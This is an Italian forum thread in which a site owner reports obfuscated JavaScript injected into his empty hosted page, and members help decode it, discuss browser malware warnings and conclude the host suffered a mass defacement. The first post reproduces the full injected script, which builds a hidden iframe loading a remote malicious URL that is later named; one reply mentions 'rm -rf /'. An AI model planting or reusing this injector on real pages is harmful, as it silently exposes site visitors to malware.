Blog Hackerato Consigli !!!

[signoredeltempo]

Ciao a tutti avevo comprato un dominio che volevo usare per un mio blog e poi ho deciso di non usarlo più. Adesso ho provato a ricollegarmi e ho trovato questo codice:

<script type="text/javascript">var _0x7e8a=["\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x67\x6E\x6F\x64\x65\x2E\x63\x6E\x2F\x73\x63\x72\x69\x70\x74\x2F\x69\x6E\x2E\x63\x67\x69","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];b=document[_0x7e8a[0x1]](_0x7e8a[0x0])[0x0];i=document[_0x7e8a[0x3]](_0x7e8a[0x2]);i[_0x7e8a[0x6]](_0x7e8a[0x4],_0x7e8a[0x5]);i[_0x7e8a[0x6]](_0x7e8a[0x7],0x0);i[_0x7e8a[0x6]](_0x7e8a[0x8],0x0);i[_0x7e8a[0x6]](_0x7e8a[0x9],0x0);b[_0x7e8a[0xa]](i);</script>

Il bello è che Firefox neanche mi avvisa che c'è un virus... infatti mi è stato detto da un' amico.



Cosa fa questo codice ?
Come fare per accorgersi che un sito ha un virus ?
E sopratutto Come hanno fatto ad hackerrami il sito che era hostato su TopHost ed era vuoto ?!?!

Grazie a tutti :conigliomg:

 

[black_devil]

Questo è un oggetto chiamato "HTMLIFrameElement".
Dovrebbe richiamare un iframe che punta non so dove. Non so come c'è arrivato li xD

 

[signoredeltempo]

Ma cosa sono quei codici ? Non si capisce niente :-/. Non lo si può tradurre in un linguaggio piu leggibile ?



Come potrebbe esserci arrivato li quel codice considerando che il sito era vuoto e quindi non aveva codice vulenrabile.

Uso anche Linux quindi escluderei virus rubapassword sul mio computer.


Esiste un antivirus/plugin per browser che mi avvisa quando trova un virus su un sito che sto visitando ?


Grazie mille
:angel:

 

[R4z0r_Cr4sH]

si che si può ma preferisco non postarlo in chiaro.La tecnica utilizzata è l'offuscamento del codice,ovvero utilizzare apparenti caratteri/segni incomprensibili per non rendere facilmente leggibile il codice.Il sito era vuoto e non aveva codice vulnerabile?
sei su linux quindi magari ti salvi da virus,posso dirti che è un virus dato che avast (non a me) l'ha rilevato.
Antivirus per browser?non ti basta quello (eventualmente) che hai sul pc associato ad un utilizzo di internet con la testa?

 

[V1R5]

JScriptCodeDom.CodeParseException: Unexpected Operator:< , Line 1, Char 0 ---> System.Exception: Unexpected Operator:<
   at JScriptCodeDom.CodeParser.ParseLazyExpressionCore(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 618
   at JScriptCodeDom.CodeParser.ParseLazyExpression(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 472
   at JScriptCodeDom.CodeParser.ParseFullExpression(Boolean bthrowerror) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 647
   at JScriptCodeDom.CodeParser.InternalParseStatementCore() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 264
   at JScriptCodeDom.CodeParser.InternalParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 137
   at JScriptCodeDom.CodeParser.ParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 69
   at JScriptCodeDom.CodeParser.ParseBlock() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 59
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 20
   --- End of inner exception stack trace ---
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 26
   at JScriptProtector.Protector.Protect(String[] codes) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 93
   at JScriptProtector.Protector.Protect(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 82
   at Jsps._Default.Button1_Click(Object sender, EventArgs e) in c:\inetpub\wwwroot\javascriptobfuscator.com\wwwroot\Default.aspx.cs:line 91

---

si che si può ma preferisco non postarlo in chiaro.

Perchè ?
Non è niente di che èh

 

[signoredeltempo]

Antivirus per browser?non ti basta quello (eventualmente) che hai sul pc associato ad un utilizzo di internet con la testa?

Beh la testa la uso ma non posso guardare i sorgenti di ogni sito per capire se ha codice malevolo :-/ Tu come fai ?
Comunque non uso antivirus. Uso Linux

JScriptCodeDom.CodeParseException: Unexpected Operator:< , Line 1, Char 0 ---> System.Exception: Unexpected Operator:<
   at JScriptCodeDom.CodeParser.ParseLazyExpressionCore(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 618
   at JScriptCodeDom.CodeParser.ParseLazyExpression(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 472
   at JScriptCodeDom.CodeParser.ParseFullExpression(Boolean bthrowerror) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 647
   at JScriptCodeDom.CodeParser.InternalParseStatementCore() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 264
   at JScriptCodeDom.CodeParser.InternalParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 137
   at JScriptCodeDom.CodeParser.ParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 69
   at JScriptCodeDom.CodeParser.ParseBlock() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 59
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 20
   --- End of inner exception stack trace ---
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 26
   at JScriptProtector.Protector.Protect(String[] codes) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 93
   at JScriptProtector.Protector.Protect(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 82
   at Jsps._Default.Button1_Click(Object sender, EventArgs e) in c:\inetpub\wwwroot\javascriptobfuscator.com\wwwroot\Default.aspx.cs:line 91

---

si che si può ma preferisco non postarlo in chiaro.

Perchè ?
Non è niente di che èh

---

ehm... ma che roba è ? :blush:

 

[R4z0r_Cr4sH]

mi sa che ho capito di che si tratta ma per principio non posto il sorgente in chiaro...almeno io!Usi linux,allora di che ti preoccupi?

 

[V1R5]

Errori dati dal decodificatore : \

 

[signoredeltempo]

mi sa che ho capito di che si tratta ma per principio non posto il sorgente in chiaro...almeno io!Usi linux,allora di che ti preoccupi?

Beh perchè se visito un sito con un virus almeno non lo faccio visitare ai miei amici windowsiani :-/

 

[RedSkull]

vuoi davvero aiutare ?
vai sul sito incriminato con linux e tramite il modulo apposito di firefox segnalalo come pericoloso, in questo modo gli utenti di firefox verranno bloccati prima...

 

[signoredeltempo]

vuoi davvero aiutare ?
vai sul sito incriminato con linux e tramite il modulo apposito di firefox segnalalo come pericoloso, in questo modo gli utenti di firefox verranno bloccati prima...

Ok ma volevo sapere voi come fate per sapere che un sito ha un virus o no!!
:blush:

---

Vabeh lo tradotto io:
In pratica crea un' iframe e la pagina incriminata è questa:

http://imgnode.cn/script/in.cgi

ho googlato è dicono che sia un virus. A me restituisce una pagina bianca.
Qualcuno lo può segnalare ? io non so farlo :blush:

 

[V1R5]

E' già stato fatto, sia chrome che firefoz rilevano il malware.

 

[MEME]

veramente il mio firefoz 3.5.x non me lo rileva

 

[RedSkull]

veramente il mio firefoz 3.5.x non me lo rileva

anche il mio, adesso faccio l'upgrade alla versione 3.5.3 e vediamo...

 

[fojeaf]

il mio chrome mi ha calciorotato fuori dal sito

cmq: se è un sito affidabile, sai che nn ha virus, se nn è affidabile, o nn ci vai, o dai una controllata. Ah, cmq, esistono virus anche per linux, anche se sono + rari, ed in genere sfruttano l'impreparazione dell'utente. Un classico esempio, è chi accede da root per comodità e poi si lamentano magari, che uno script ha lanciato rm -rf / (è successo ad uno che net-conosco... un co****** nato sinceramente)

 

[cyd]

il server su cui hostavi il sito è tuo?

 

[Predator]

ha detto che il dominio è suo, non il server
ma non basta ripulire l'index?

 

[cyd]

dal momento che non c'era sito i casi sno due mi sembra...
o è stato infettato il server da un programmino che scrive questo codice in ogni index di ogni sito presente su di esso oppure uno stro*** ha ottenuto l'accesso al server e ti ha infettato la pagina manualmente..
.. se è un server condiviso interroga qualche db whois e scopri gli altri siti hostati, guardane i sorgenti e controlla se il codice è presente anche in questi e eventualmente avverti i tuoi padroni di casa...

 

[fojeaf]

o forse ha semplicemente usato una pass troppo semplice

 

[signoredeltempo]

Non ho usato password semplice e gli altri siti hostati ( sono 4 in tutto ) non sono stati minimamente toccati.

Il sito è hostato su un server famoso ed economico ( inizia con la T ) :conigliomg:

 

[Langy]

quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

 

[signoredeltempo]

quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

Nessun CMS... il sito era VUOTO !! C'era solo la index in html :angel:

 

[Langy]

quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

Nessun CMS... il sito era VUOTO !! C'era solo la index in html :angel:

e allora e' stato fatto un massdeface al tuo hosting

 

[signoredeltempo]

quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

Nessun CMS... il sito era VUOTO !! C'era solo la index in html :angel:

e allora e' stato fatto un massdeface al tuo hosting

Infatti lo immaginavo volevo solo la conferma :conigliomg:

 

[Luke34]

che hosting usavi?